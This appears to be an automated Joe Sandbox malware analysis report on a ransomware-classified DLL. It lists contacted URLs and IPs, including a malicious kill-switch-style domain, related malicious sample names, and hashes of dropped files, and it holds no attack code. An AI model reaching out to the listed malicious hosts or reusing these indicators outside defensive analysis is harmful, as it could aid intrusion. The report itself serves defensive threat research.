                                    https://www.bing.cpi/vbackgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365406036.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ris.api.iris.micrbackgroundTaskHost.exe, 00000024.00000000.562702503.000001D426A91000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.google.comsvchost.exe, 00000021.00000000.396028620.00000247D1CC9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.800444003.00000247D1CC9000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwermssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCmssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.bingmapsportal.comsvchost.exe, 00000014.00000002.326573506.000001C91F613000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJmssecsvc.exe, 00000004.00000002.663004539.000000000019C000.00000004.00000010.00020000.00000000.sdmptrue
                                          • URL Reputation: safe
                                          		unknown
                                          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000014.00000003.325809499.000001C91F656000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://store-images.s-microsbackgroundTaskHost.exe, 00000024.00000000.543434763.000001D426613000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000014.00000003.325809499.000001C91F656000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.ver)svchost.exe, 00000019.00000002.682240230.000001FF10C87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000014.00000002.329316521.000001C91F65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325640899.000001C91F65C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.pki.goog/gtsr1/gtsr1.crl0Wlsass.exe, 00000009.00000000.276000241.00000240B2694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.799419871.00000240B26AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285841175.00000240B2694000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.326573506.000001C91F613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://pki.goog/repository/0lsass.exe, 00000009.00000000.276000241.00000240B2694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.799419871.00000240B26AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285841175.00000240B2694000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://%s.xboxlive.comsvchost.exe, 00000011.00000002.793454097.000001F18B83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		low
                                                      https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000014.00000003.325657488.000001C91F648000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.329211076.000001C91F64F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000014.00000002.328783143.000001C91F642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325819454.000001C91F641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ris.iris.mibackgroundTaskHost.exe, 00000024.00000003.530398223.000001D4241D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000014.00000002.329316521.000001C91F65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325640899.000001C91F65C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://pf.directory.live.com/profile/profile.asmxbackgroundTaskHost.exe, 0000001C.00000000.370554204.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.356234041.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392348693.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387781701.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365252597.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.527484605.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383213238.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.341995914.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351629179.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347111414.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360350565.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378318070.0000019B7B628000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dynamic.tsvchost.exe, 00000014.00000003.325809499.000001C91F656000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000014.00000002.328783143.000001C91F642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325819454.000001C91F641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.kryptoslogic.commssecsvc.exe, 00000006.00000002.361889160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000014.00000002.329316521.000001C91F65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325640899.000001C91F65C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://activity.windows.comsvchost.exe, 00000011.00000002.793454097.000001F18B83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://arc.msn.coPbackgroundTaskHost.exe, 00000024.00000000.586901114.000001D4264CC000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.448289508.000001D4264CC000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.520676657.000001D4264CC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://%s.dnet.xboxlive.comsvchost.exe, 00000011.00000002.793454097.000001F18B83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		low
                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000014.00000003.325716393.000001C91F659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.329272939.000001C91F65A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.16.173.80
                                                                              		www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comUnited States
                                                                              		13335CLOUDFLARENETUStrue
                                                                              104.17.244.81
                                                                              		unknownUnited States
                                                                              		13335CLOUDFLARENETUStrue

                                                                              Private

                                                                              IP
                                                                              127.0.0.1

                                                                              General Information

                                                                              Joe Sandbox Version:35.0.0 Citrine
                                                                              Analysis ID:670186
                                                                              Start date and time: 20/07/202217:49:482022-07-20 17:49:48 +02:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 15m 55s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Sample file name:FjYNZSPNkt (renamed file extension from none to dll)
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                              Number of analysed new started processes analysed:23
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:18
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.rans.troj.evad.winDLL@30/53@2/3
                                                                              EGA Information:
                                                                              • Successful, ratio: 66.7%
                                                                              HDC Information:
                                                                              • Successful, ratio: 29.3% (good quality ratio 26.6%)
                                                                              • Quality average: 77.2%
                                                                              • Quality standard deviation: 32.4%
                                                                              HCA Information:
                                                                              • Successful, ratio: 81%
                                                                              • Number of executed functions: 22
                                                                              • Number of non-executed functions: 99
                                                                              Cookbook Comments:
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Override analysis time to 240s for rundll32

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.40.129.122, 23.213.164.66, 20.40.136.238, 20.31.106.135, 20.238.103.94, 8.238.85.126, 67.26.139.254, 67.26.73.254, 8.248.131.254, 8.238.85.254
                                                                              • Excluded domains from analysis (whitelisted): fmghaw.com, wxqeub.com, egzhiu.com, odkwag.com, taseju.com, foefmh.com, fnkuzp.com, oyiqis.com, fs-wildcard.microsoft.com.edgekey.net, halijb.com, pamieb.com, veadit.com, bixitk.com, tarnof.com, eunure.com, uuvznv.com, iigysp.com, wzzoyp.com, www.bing.com, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, uehixu.com, gveozl.com, ris-prod.trafficmanager.net, nsnpie.com, ouuquq.com, pbswoe.com, ris.api.iris.microsoft.com, imeonl.com, swihwi.com, kvzuyb.com, iegroa.com, zajvof.com, kkujyi.com, ieuydr.com, fg.download.windowsupdate.com.c.footprint.net, evcswy.com, ipffhg.com, dlaiin.com, cjtnlz.com, ryeofz.com, pzrdea.com, iris-de-prod-azsc-weu.westeurope.cloudapp.azure.com, arc.trafficmanager.net, bjnyie.com, prod.fs.microsoft.com.akadns.net, hmogya.com, naciyn.com, juiape.com, oyjapg.com, tqrihq.com, ant.trenz.pl, daufsi.com, fmleqf.com, iuzrbo.com, wu-bg-shim.trafficmanager.net, riwegs.com, kdbimr.com, xnynlv.com, wwflce.com, ryrgex.com, lbhuwa.com, pjyjyp.
                                                                              • Execution Graph export aborted for target tasksche.exe, PID 3908 because there are no executed function
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              17:51:07API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                              17:51:31API Interceptor3x Sleep call for process: svchost.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              104.16.173.80q18L3fXHcX.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              fPFPnWqeow.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              25HrP4nB7z.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              qeoYR80875.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              0AoAuUD0hv.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              GRse5xOyWS.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              1Pf340IWZT.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              Cw6bTawfPR.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              lF88TMoBXK.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              EQ6oxEN381.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              vR5qE3L7ow.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              mqGD2k04wg.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              5CzpLpyDvs.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              X3vbdqFLUr.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              V5E1THfAvp.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              TfN4L9J5dc.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              SDpiC5bJDG.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              SRm1E5EfSU.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              n321zWdF9X.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                                                                              WF68F77LLw.dllGet hashmaliciousBrowse
                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comq18L3fXHcX.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              fPFPnWqeow.dllGet hashmaliciousBrowse
                                                                              • 104.16.173.80
                                                                              GH3Nse733b.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              3zkECrUffH.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              25HrP4nB7z.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              qeoYR80875.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              0AoAuUD0hv.dllGet hashmaliciousBrowse
                                                                              • 104.16.173.80
                                                                              2RjU5Sgppd.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              Jj29gnNYzx.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              GRse5xOyWS.dllGet hashmaliciousBrowse
                                                                              • 104.16.173.80
                                                                              1Pf340IWZT.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              Cw6bTawfPR.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              lF88TMoBXK.dllGet hashmaliciousBrowse
                                                                              • 104.16.173.80
                                                                              EQ6oxEN381.dllGet hashmaliciousBrowse
                                                                              • 104.16.173.80
                                                                              vR5qE3L7ow.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              DlxI9O90Df.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              45Aq5PJ7wy.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              6kocFOY6i7.dllGet hashmaliciousBrowse
                                                                              • 104.16.173.80
                                                                              mqGD2k04wg.dllGet hashmaliciousBrowse
                                                                              • 104.16.173.80
                                                                              lpETIMKCTG.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              CLOUDFLARENETUSuZqCEvStF9.dllGet hashmaliciousBrowse
                                                                              • 104.29.91.176
                                                                              Purchase order #44827.docxGet hashmaliciousBrowse
                                                                              • 104.18.183.224
                                                                              JVjvJDcyo7.dllGet hashmaliciousBrowse
                                                                              • 172.68.168.51
                                                                              Details5621Opuqhzrxqhaycmmxkaywlkktoonbomxuaj.exeGet hashmaliciousBrowse
                                                                              • 162.159.134.233
                                                                              fPFPnWqeow.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              Purchase order #44827.docxGet hashmaliciousBrowse
                                                                              • 104.18.183.224
                                                                              GH3Nse733b.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              PO-AM2207586.xlsxGet hashmaliciousBrowse
                                                                              • 188.114.96.3
                                                                              3zkECrUffH.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              25HrP4nB7z.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              Halkbank_Ekstre_201805002_103141_273160.pdf.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97
                                                                              38grJ6wbWq.htmlGet hashmaliciousBrowse
                                                                              • 104.17.8.210
                                                                              SecuriteInfo.com.VBA.Logan.3458.3825.xlsGet hashmaliciousBrowse
                                                                              • 104.18.182.224
                                                                              n_message-audio.htmGet hashmaliciousBrowse
                                                                              • 104.17.25.14
                                                                              SecuriteInfo.com.VBA.Logan.3458.27204.xlsGet hashmaliciousBrowse
                                                                              • 104.18.183.224
                                                                              https://nationalgiveawaypr9.editorx.io/my-siteGet hashmaliciousBrowse
                                                                              • 104.17.25.14
                                                                              SecuriteInfo.com.VBA.Logan.3458.3825.xlsGet hashmaliciousBrowse
                                                                              • 104.18.183.224
                                                                              SecuriteInfo.com.VBA.Logan.3458.27204.xlsGet hashmaliciousBrowse
                                                                              • 104.18.183.224
                                                                              http://tracking.vedupdate.com/tracking/click?d=1k1ihPA66PZCuLWj2723CooG7W1qjCbMOZOaHhQFcoxVzieX6RuPHWcWVjdWtiqrru39deCSQ5gZar-DUza0TNM9U7eEkZG_PvwrPBZZyFuGPyiAlKaWhLJA70sXmkQDSk0f0t_0S__n0XK04eiBxuyCnAEjGo-rhlykrsxPG6M0OIeGNUinOr309LpQGOVu9w2Get hashmaliciousBrowse
                                                                              • 104.22.24.131
                                                                              0NoB6NOrRp.exeGet hashmaliciousBrowse
                                                                              • 23.227.38.74
                                                                              CLOUDFLARENETUSuZqCEvStF9.dllGet hashmaliciousBrowse
                                                                              • 104.29.91.176
                                                                              Purchase order #44827.docxGet hashmaliciousBrowse
                                                                              • 104.18.183.224
                                                                              JVjvJDcyo7.dllGet hashmaliciousBrowse
                                                                              • 172.68.168.51
                                                                              Details5621Opuqhzrxqhaycmmxkaywlkktoonbomxuaj.exeGet hashmaliciousBrowse
                                                                              • 162.159.134.233
                                                                              fPFPnWqeow.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              Purchase order #44827.docxGet hashmaliciousBrowse
                                                                              • 104.18.183.224
                                                                              GH3Nse733b.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              PO-AM2207586.xlsxGet hashmaliciousBrowse
                                                                              • 188.114.96.3
                                                                              3zkECrUffH.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              25HrP4nB7z.dllGet hashmaliciousBrowse
                                                                              • 104.17.244.81
                                                                              Halkbank_Ekstre_201805002_103141_273160.pdf.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97
                                                                              38grJ6wbWq.htmlGet hashmaliciousBrowse
                                                                              • 104.17.8.210
                                                                              SecuriteInfo.com.VBA.Logan.3458.3825.xlsGet hashmaliciousBrowse
                                                                              • 104.18.182.224
                                                                              n_message-audio.htmGet hashmaliciousBrowse
                                                                              • 104.17.25.14
                                                                              SecuriteInfo.com.VBA.Logan.3458.27204.xlsGet hashmaliciousBrowse
                                                                              • 104.18.183.224
                                                                              https://nationalgiveawaypr9.editorx.io/my-siteGet hashmaliciousBrowse
                                                                              • 104.17.25.14
                                                                              SecuriteInfo.com.VBA.Logan.3458.3825.xlsGet hashmaliciousBrowse
                                                                              • 104.18.183.224
                                                                              SecuriteInfo.com.VBA.Logan.3458.27204.xlsGet hashmaliciousBrowse
                                                                              • 104.18.183.224
                                                                              http://tracking.vedupdate.com/tracking/click?d=1k1ihPA66PZCuLWj2723CooG7W1qjCbMOZOaHhQFcoxVzieX6RuPHWcWVjdWtiqrru39deCSQ5gZar-DUza0TNM9U7eEkZG_PvwrPBZZyFuGPyiAlKaWhLJA70sXmkQDSk0f0t_0S__n0XK04eiBxuyCnAEjGo-rhlykrsxPG6M0OIeGNUinOr309LpQGOVu9w2Get hashmaliciousBrowse
                                                                              • 104.22.24.131
                                                                              0NoB6NOrRp.exeGet hashmaliciousBrowse
                                                                              • 23.227.38.74

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):8192
                                                                              Entropy (8bit):0.3593198815979092
                                                                              Encrypted:false
                                                                              SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                              MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                              SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                              SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                              SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                              Malicious:false
                                                                              Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:MPEG-4 LOAS
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.2494772344026733
                                                                              Encrypted:false
                                                                              SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4B:BJiRdwfu2SRU4B
                                                                              MD5:DEC059FD9745A1CE2C52D3204F8733E1
                                                                              SHA1:5A3D91EBDC56D75F80FDAADA1B7C3950080B15CD
                                                                              SHA-256:90EA7B989F684CF4EAF221C686C1E17A20C05E7CFD2E3EA6841A5DD99854D19D
                                                                              SHA-512:DDD20C0D7ECB5BED28BF6979E2AF568134097114FFAB91EE9A3795C68E1BDAD459EEE4EA28598538F0C6A2C38732FAC47137E437A30753AA0EFDF6964EEF9F50
                                                                              Malicious:false
                                                                              Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x20b281b8, page size 16384, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):786432
                                                                              Entropy (8bit):0.2507098173884764
                                                                              Encrypted:false
                                                                              SSDEEP:384:A8E8I+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:AfySB2nSB2RSjlK/+mLesOj1J2
                                                                              MD5:C2792AE423918088E4AFFAC562B38DC6
                                                                              SHA1:2C08648EEC0846C9F6607BD18687FF0F43A51787
                                                                              SHA-256:82FCFD75558D9C206131E7A1804CE77CE7E5C3D41248CDD707774186D1B58980
                                                                              SHA-512:C9605F0B9E8AD7BD8B38F946CD93AE1338C9C4D4703C5C725CEFE387D4573DDCFEC8D9A644143B5B87133387EC2AC8645AE03A8FC3C783411D2029638B302324
                                                                              Malicious:false
                                                                              Preview: ...... ................e.f.3...w........................).....+6...z...3...z3.h.(.....+6...z....)..............3...w...........................................................................................................B...........@...................................................................................................... ...................................................................................................................................................................................................................................................~...+6...z..................C..w+6...z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):0.07689334245217043
                                                                              Encrypted:false
